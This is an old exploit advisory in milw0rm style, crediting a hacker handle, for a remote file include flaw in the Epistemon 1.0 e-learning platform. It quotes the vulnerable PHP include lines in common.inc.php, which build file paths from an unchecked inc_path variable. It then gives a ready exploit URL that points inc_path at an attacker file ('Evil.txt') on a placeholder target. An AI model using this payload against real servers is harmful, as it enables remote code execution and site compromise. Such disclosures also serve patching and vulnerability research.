-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Epistemon 1.0 <= Remote File Include Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Discovered by GolD_M(Mahmnood_ali) & & Contact: HackEr_@W.Cn -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= URL: http://sourcesup.cru.fr/frs/download.php/668/Epistemon_V1.tgz -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= V.CODE: In : /plateforme/code/inc/common.inc.php include($inc_path.'config.php'); include ($inc_path."i18n.inc.php"); include ($inc_path."const.inc.php") ; include ($inc_path."c_init.inc".$ext) ; include ($inc_path."c_chapitre.inc".$ext) ; include ($inc_path."c_color.inc".$ext) ; include ($inc_path."c_connexion.inc".$ext); include ($inc_path."c_file.inc".$ext) ; include ($inc_path."c_formation.inc".$ext); include ($inc_path."c_groupe.inc".$ext) ; include ($inc_path."c_header.inc".$ext) ; include ($inc_path."c_mail.inc".$ext) ; include ($inc_path."c_membre.inc".$ext) ; include ($inc_path."c_webmail.inc".$ext) ; include ($inc_path."c_module.inc".$ext) ; include ($inc_path."c_mysql.inc".$ext) ; include ($inc_path."c_phorum.inc".$ext) ; include ($inc_path."c_tuteur.inc".$ext) ; include ($inc_path."c_document.inc".$ext) ; include ($inc_path."html.inc".$ext) ; include ($inc_path."c_complement.inc".$ext); -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Exploit: http://www.hedef.com/[path]/plateforme/code/inc/common.inc.php?inc_path=Evil.txt -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Thanx : Tryag.Com & DwRaT.Com & Asb-May.Net & Milw0rm.com & H4cky0u.Com & Google.Com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # milw0rm.com [2007-02-01]